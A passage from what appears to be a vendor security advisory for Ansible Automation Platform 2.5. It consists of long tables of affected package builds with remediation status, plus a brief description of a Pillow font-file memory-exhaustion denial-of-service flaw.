| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library's font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
